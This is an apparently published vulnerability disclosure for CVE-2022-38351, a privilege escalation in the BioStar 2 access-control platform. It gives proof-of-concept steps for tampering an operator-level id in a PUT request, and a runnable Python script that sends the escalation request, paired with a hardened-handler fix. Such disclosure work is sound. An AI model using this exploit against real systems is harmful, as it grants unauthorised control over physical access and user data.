Privilege escalation from User Operator to System Administrator

CVE-2022-38351

Product & Service Introduction:

BioStar 2 is a web-based, open, and integrated security platform that provides comprehensive functionality for access control, time & attendance management, visitor management, and video log maintenance. It encrypts all personal data it stores and supports both SDKs and web APIs for integrating BioStar 2 with third-party software. In addition, users can control the BioStar 2 platform remotely with the BioStar 2 mobile app and manage a mobile access card that they can use to access sites.

Technical Description:

The BioStar 2 web application has 7 different operator levels, each with different privileges: "Administrator" has full permission to do everything in the web application, while "User Operator" has limited privileges. Due to missing server-side validation, the application trusts the operator-level id that the client sends when a profile is updated, so I identified a way to escalate my privileges from User Operator to System Administrator. To exploit this vulnerability the attacker must already be authenticated to the target web application and logged in as a "User Operator".

The security risk of the vulnerability is High, with a CVSS (Common Vulnerability Scoring System) score of 8.8.

Successful exploitation of the vulnerability results in gaining Administrator privileges, giving the attacker control over the entire system, for example:

  • Delete, modify and add any user
  • Delete, modify and add any door
  • Access all users' information from Active Directory, if the system is integrated with AD, and much more

Proof of Concept (POC):

  • Log in to the web application as your "User Operator".
  • Open the profile edit page, start intercepting requests with Burp Suite, then click on "User".
  • Apply the changes, then in the intercepted PUT request change the value of the "id" parameter from 255 to 1. Here 1 is the Administrator operator level and 255 is the User Operator level.
Screenshot: Updated PUT request, the value has been changed from 255 to 1.
  • Almost done: the privileges have been escalated from User Operator to System Administrator. Log out, then log in again to the dashboard to see the changes.
Screenshot: Admin User

Exploit using python:

A Python script that takes 2 inputs from the user:

--userid: the id of the current user on the system

--token: the session token of the logged-in user; the script uses it to send a PUT request that updates the User Operator level.

Screenshot: Running the script
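The page describes the script but does not reproduce it, and it does not show the exact request shape. Below is an added example, written for this page and not the original author's script or Suprema's code, that does two things: it builds the PUT request of the PoC above from the same two inputs (user id and session token), and it models the server-side update handler both without and with the validation whose absence is the root cause. The endpoint path `/api/users/{id}`, the `bs-session-id` header and the `{"permission": {"id": N}}` body layout are assumptions; the values 1 (Administrator) and 255 (User Operator) come from the page.

```python
"""
Added example for CVE-2022-38351 (not the page author's script, not Suprema's code).

Assumed request shape (the page does not show it in full):
  - endpoint: PUT {base_url}/api/users/{user_id}        (assumption)
  - session:  carried in a 'bs-session-id' header      (assumption)
  - body:     {"permission": {"id": N}}                (assumption)
Operator level ids: 1 = Administrator, 255 = User Operator (from the page).
"""
import argparse
import json
import urllib.request

ADMINISTRATOR = 1
USER_OPERATOR = 255


def build_escalation_request(base_url: str, user_id: int, token: str) -> dict:
    """The attacker's own user id and session token, with the operator level
    changed from 255 to 1, exactly as in the intercepted Burp request."""
    return {
        "method": "PUT",
        "url": f"{base_url.rstrip('/')}/api/users/{user_id}",
        "headers": {"bs-session-id": token, "Content-Type": "application/json"},
        "json": {"permission": {"id": ADMINISTRATOR}},
    }


def send(req: dict) -> int:
    """Send a request built above; returns the HTTP status code."""
    r = urllib.request.Request(req["url"], data=json.dumps(req["json"]).encode(),
                               headers=req["headers"], method=req["method"])
    with urllib.request.urlopen(r) as resp:
        return resp.status


# --- server side: minimal model of the profile-update handler -------------
# `users` is a constructed in-memory stand-in for the user table:
# user id -> operator level id.

def vulnerable_update_user(users: dict, caller_id: int, target_id: int, body: dict) -> None:
    """No server-side validation: whatever operator level the client sends is
    written back, so a User Operator can make itself Administrator."""
    users[target_id] = int(body["permission"]["id"])


def hardened_update_user(users: dict, caller_id: int, target_id: int, body: dict) -> None:
    """Authorisation is taken from the caller's server-side session role, not
    from the request body. Non-administrators may only edit their own profile
    and any attempt to send a permission object is rejected, not ignored."""
    requested = body.get("permission")
    if users[caller_id] != ADMINISTRATOR:
        if target_id != caller_id:
            raise PermissionError("non-administrators may only edit their own profile")
        if requested is not None:
            raise PermissionError("operator level can only be set by an Administrator")
        return  # other, harmless profile fields would be applied here
    if requested is not None:
        users[target_id] = int(requested["id"])


def escalation_succeeds(handler) -> bool:
    """Replay the PoC against a handler: user 7 is a User Operator who sends
    the crafted body for its own id. True if it ends up as Administrator."""
    users = {1: ADMINISTRATOR, 7: USER_OPERATOR}  # constructed sample data
    req = build_escalation_request("https://biostar.example", 7, "session-token")
    try:
        handler(users, caller_id=7, target_id=7, body=req["json"])
    except PermissionError:
        pass
    return users[7] == ADMINISTRATOR


if __name__ == "__main__":
    p = argparse.ArgumentParser(description="CVE-2022-38351 PoC (assumed request shape)")
    p.add_argument("--url", required=True, help="BioStar 2 base URL")
    p.add_argument("--userid", type=int, required=True, help="id of the logged-in User Operator")
    p.add_argument("--token", required=True, help="session token of that user")
    a = p.parse_args()
    print("HTTP", send(build_escalation_request(a.url, a.userid, a.token)))
```

`escalation_succeeds(vulnerable_update_user)` is True and `escalation_succeeds(hardened_update_user)` is False. The point of the hardened handler is that the decision depends only on the role stored for the session on the server; the client-supplied `permission` object is never consulted for anyone but an Administrator, and for everyone else its mere presence is treated as a rejected request rather than silently dropped, which also gives defenders a 403 to alert on.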

Solution – Fix & Patch:

Suprema recommends upgrading to the latest version of BioStar 2, which at the time of publishing this blog (2022 Q4) is v2.9.1.